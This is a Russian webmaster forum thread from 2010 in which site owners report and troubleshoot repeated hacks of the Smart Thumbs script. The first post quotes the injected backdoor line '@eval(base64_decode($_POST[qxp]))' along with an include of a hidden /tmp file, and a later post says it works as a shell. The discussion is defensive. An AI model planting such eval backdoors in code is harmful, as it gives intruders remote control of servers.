Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: Smart Thumbs, опять сломали?
цитата
19/02/10 в 18:51
 iron-man
Случайно сегодня обнаружил, что файлы variables.php были модифицированы на всех доменах, были вставлены строчки @include_once('/tmp/.ICE-unix/ases.tmp'); и кое-где @eval(base64_decode($_POST[qxp]));
Версия скрипта была 5.76... Т.е. после того, как смартовцы фиксили скрипт, опять нашлась какая-то уязвимоть...
Проверятесь...
цитата
19/02/10 в 19:53
 Wesstyle
same shit
цитата
19/02/10 в 23:25
 Grach
iron-man писал:
Версия скрипта была 5.76... Т.е. после того, как смартовцы фиксили скрипт, опять нашлась какая-то уязвимоть...
Проверятесь...

интересно, в последней версии 5.77 тоже это есть?
цитата
20/02/10 в 00:23
 Foxy Babe
на ADX-e не писал никто на эту тему? авторы скрипта там тусят

руками то врядли будет толк если удалять
цитата
20/02/10 в 00:40
 Wesstyle
у меня версия 5.77
пока поставил права 444 на variables.php
цитата
20/02/10 в 01:15
 Soft-Com
а какая вообще защита стояла? (обновлённая версия защитой не является)
цитата
20/02/10 в 10:41
 Man of war
есть несколько сиджей- один сделан главным, остальные пркручены к нему сабами
в file check странная хренотень:
на главном домене все файлы -OK
а на всех сабах:
Код:

flush.php - OK
search.php - OK
st.php - OK
st_counter.php - OK
admin/autocrop.php - OK
admin/check.php - OK
admin/cron.php - OK
admin/edit_picture.php - OK
admin/edit_spot.php - OK
admin/sync.php - OK
admin/thumbscan.php - OK
admin/traffic_check.php - OK
admin/win_edit.php - OK
admin/lock.php - OK
admin/secure.php - OK
admin/unlock.php - OK
admin/fhg_downloader.php - OK
admin/services.php - OK
admin/rotator.php - OK
classes/antibot_class.php - OK
classes/CropImage.php - OK
classes/functions.php - OK
classes/htaccess_class.php - OK
classes/mail_class.php - OK
classes/mysql_class.php - OK
classes/rotator_class.php - OK
classes/scan_class.php - OK
classes/nusoap.php - OK
submit/antibot.php - OK
submit/index.php - OK
admin/autocrop.php - unknown file
admin/check.php - unknown file
admin/cron.php - unknown file
admin/edit_picture.php - unknown file
admin/edit_spot.php - unknown file
admin/sync.php - unknown file
admin/thumbscan.php - unknown file
admin/traffic_check.php - unknown file
admin/win_edit.php - unknown file
admin/lock.php - unknown file
admin/secure.php - unknown file
admin/unlock.php - unknown file
admin/fhg_downloader.php - unknown file
admin/services.php - unknown file
admin/rotator.php - unknown file
classes/mysql.php - unknown file
classes/antibot_class.php - unknown file
classes/CropImage.php - unknown file
classes/functions.php - unknown file
classes/htaccess_class.php - unknown file
classes/mail_class.php - unknown file
classes/mysql_class.php - unknown file
classes/rotator_class.php - unknown file
classes/scan_class.php - unknown file
classes/nusoap.php - unknown file
submit/antibot.php - unknown file
submit/index.php - unknown file
flush.php - unknown file

почему сначало ОК и тут же для этих же файлов- неизвестный файл?
цитата
20/02/10 в 11:00
 JM
/tmp/.ICE-unix/ases.tmp что тут есть?
цитата
20/02/10 в 11:05
 Foxy Babe
мы тут поковыряли с товарищами и пришли к выводу что это невычищенным осталось после ноябрьского взлома, судя по датам создания файлов variables
цитата
20/02/10 в 11:16
 Man of war
JM писал:
/tmp/.ICE-unix/ases.tmp что тут есть?

где точнее натйи такое ? в st/ не вижу таких папок..
цитата
20/02/10 в 11:50
 Wesstyle
Soft-Com писал:
а какая вообще защита стояла? (обновлённая версия защитой не является)

никаких дополнительных защит не ставил
цитата
20/02/10 в 14:46
 iron-man
Foxy Babe писал:
мы тут поковыряли с товарищами и пришли к выводу что это невычищенным осталось после ноябрьского взлома, судя по датам создания файлов variables

у меня файлы были изменены 16 февраля... После ноябрьского взлома я все вычистил, видимо пролезли снова...
цитата
26/02/10 в 21:05
 Wesstyle
сегодня опять эта зараза появилась. не помог и chmod 444 variables.php
цитата
03/03/10 в 00:42
 Wesstyle
отловили таки корень этой гадости. спасибо большое Soft-Com! smail54.gif
цитата
03/03/10 в 10:37
 cdroller
Manowar писал:
почему сначало ОК и тут же для этих же файлов- неизвестный файл?
Патамушта скрипт криво заинсталлил, чилды не надо инсталлировать через install.php На форуме Smart Thumbs написано как бороться с кривым инсталлом, можно топик поискать "unknown file"... на сколько помню, сохранить темплатесы и удалить все из папки st на чилд домене, потом зайти на основной домен в админку в раздел настроек и нажать сохранение, Smart Thumbs сам сделает файлы которые нужны на чилде... там вместо всей этой кучи ненужных файлов будет всего несколько...

и вот когда так криво инсталлируют, то и ломается все легко... точнее там даже ломать не надо, потому что на чилд-доменах админка не защищена вообще... ее там просто не должно быть, только вариаблес...
цитата
14/06/10 в 11:33
 iron-man
Опять хакнули СТ icon_sad.gif Пролазит и все тут, эта зараза icon_sad.gif
Все сделал как здесь http://www.pornxspace.com/webmasters/2010/05/08/smartthumbs-exploit-explained/ в конце мая, ща опять смомтрю, все тоже самое icon_sad.gif
цитата
14/06/10 в 11:53
 Soft-Com
скорее всего изначально не всё вычищено было
цитата
14/06/10 в 16:12
 iron-man
А что они вообще делают, когда пролезут? Как используют уязвимость?
цитата
15/06/10 в 00:29
 CABMIT
iron-man: судя по eval'у - как шелл, или сплойты какие-нибудь заливают


Эта страница в полной версии